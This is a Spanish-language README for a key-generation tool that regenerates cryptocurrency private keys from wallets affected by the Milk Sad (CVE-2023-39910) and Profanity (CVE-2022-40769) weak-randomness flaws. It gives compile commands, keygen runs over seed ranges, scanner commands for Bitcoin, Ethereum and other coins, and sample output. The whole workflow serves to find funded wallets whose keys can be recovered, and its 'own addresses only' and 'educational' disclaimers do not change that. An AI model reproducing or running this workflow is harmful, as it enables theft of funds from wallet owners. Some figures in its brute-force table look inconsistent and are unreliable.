
DONAR: bc1qps62cyk9f9unmdkc9k3ccj9e2h8ywfhg2j53ec
Hecho con ❤️ para la comunidad de investigación en criptomonedas.
DESCRIPCIÓN: Esta herramienta genera claves privadas a partir de dos vulnerabilidades críticas que afectaron a carteras de criptomonedas. Crea archivos TXT con claves privadas hexadecimales (64 caracteres = 256 bits) que pueden introducirse en AllChainScanner para la generación de direcciones y la comprobación de saldos.
🔴 ¡GENERA CLAVES A PARTIR DE 2 GRANDES VULNERABILIDADES CRIPTO!
CVE-2023-39910 (Libbitcoin Explorer / Milk Sad)
CVE-2022-40769 (Profanity - generador de direcciones vanity de Ethereum)
Paso 1: Genera claves ./keygen 0 1000000 keys.txt
Paso 2: Archivos de salida creados
Paso 3: Aliméntalos a AllChainScanner ./AllChainScanner -f libbitcoin_keys.txt -o found.txt -t all ./AllChainScanner -f profanity_keys.txt -o found.txt -t all
Paso 4: El escáner convierte el hexadecimal de 64 caracteres en:
COMPILAR: g++ -O3 -march=native -o keygen keygen.cpp -std=c++17
USO: ./keygen [start_seed] [end_seed] [output.txt]
PARÁMETROS: start_seed Semilla inicial (predeterminado: 0) end_seed Semilla final (predeterminado: 1000000) output.txt Nombre del archivo de salida (predeterminado: keys.txt)
EJEMPLOS: ./keygen 0 1000000 keys.txt → Genera 1.000.000 de claves (de 0 a 999.999)
./keygen 1000000 2000000 keys.txt → Genera 1.000.000 de claves (de 1.000.000 a 1.999.999)
./keygen 0 10000000 keys.txt → Genera 10.000.000 de claves (tarda ~1-2 minutos)
Archivo: libbitcoin_.txt
Archivo: profanity_.txt
ENLACE: https://github.com/ethicbrudhack/AllChainScanner-Bitcoin-eth-zcash-etc..-
Genera claves: ./keygen 0 10000000 keys.txt
Escanea claves de Bitcoin: ./AllChainScanner -f libbitcoin_keys.txt -o btc_found.txt -t P2PKH ./AllChainScanner -f libbitcoin_keys.txt -o btc_found.txt -t P2SH ./AllChainScanner -f libbitcoin_keys.txt -o btc_found.txt -t bech32
Escanea claves de Ethereum: ./AllChainScanner -f profanity_keys.txt -o eth_found.txt -t ethereum
Escanea todas las monedas: ./AllChainScanner -f libbitcoin_keys.txt -o all_found.txt -t HEX
Todas las claves generadas funcionan con: ✅ Bitcoin (1..., 3..., bc1...) ✅ Ethereum (0x...) ✅ Litecoin (L..., M...) ✅ Dogecoin (D...) ✅ Dash (X...) ✅ Zcash (t1..., t3...) ✅ Bitcoin Cash (bitcoincash:...) ✅ BNB Smart Chain (0x...) ✅ Polygon (0x...) ✅ Avalanche C-Chain (0x...)
CVE-2023-39910 (Milk Sad):
CVE-2022-40769 (Profanity):
*Basado en:
Ejecutando: ./keygen 0 5 keys.txt
Rango: 0 - 5 Número de claves: 5 Archivo de salida: keys.txt
[1] CVE-2023-39910 (Libbitcoin/Milk Sad) - generando... 5/5 | 2500000 claves/s Guardado: libbitcoin_keys.txt (0.0s)
[2] CVE-2022-40769 (Profanity) - generando... 5/5 | 2500000 claves/s Guardado: profanity_keys.txt (0.0s)
Usa siempre ambos generadores
Genera rangos amplios
Combínalo con otros escáneres
Mantén found.txt a salvo
⚠️ ¡ESTA HERRAMIENTA GENERA CLAVES PRIVADAS REALES! ⚠️ ¡PRUÉBALA SOLO EN DIRECCIONES QUE SEAN TUYAS! ⚠️ ¡NO LA USES PARA ACTIVIDADES ILEGALES! ⚠️ ¡MANTÉN FOUND.TXT SEGURO: CONTIENE CLAVES PRIVADAS!
Las claves generadas por esta herramienta:
CVE-2023-39910: https://nvd.nist.gov/vuln/detail/CVE-2023-39910 CVE-2022-40769: https://nvd.nist.gov/vuln/detail/CVE-2022-40769 Milk Sad: https://milksad.info Profanity: https://github.com/1r0n1c/profanity AllChainScanner: https://github.com/ethicbrudhack/AllChainScanner-Bitcoin-eth-zcash-etc..-
Licencia MIT: solo con fines educativos y de investigación
============================================================
| Generador | Velocidad (claves/s) | Tiempo 1M claves | Tiempo 10M claves |
|---|
| CVE-2023-39910 | ~2.000.000 | ~0,5 s | ~5 s |
| CVE-2022-40769 | ~2.000.000 | ~0,5 s | ~5 s |
| Combinado | ~1.000.000 | ~1 s | ~10 s |
| Vulnerabilidad | Entropía | Posibilidades | Tiempo de fuerza bruta* |
|---|
| CVE-2023-39910 | 32 bits | 4,29 × 10^9 | ~8 segundos (24 palabras) |
| CVE-2023-39910 | 32 bits | 4,29 × 10^9 | ~12 minutos (BIP32) |
| CVE-2022-40769 | 32 bits | 4,29 × 10^9 | ~8 segundos (24 palabras) |
| CVE-2022-40769 | 32 bits | 4,29 × 10^9 | ~12 minutos (BIP32) |
| REAL 256 bits | 256 bits | 1,16 × 10^77 | Imposible |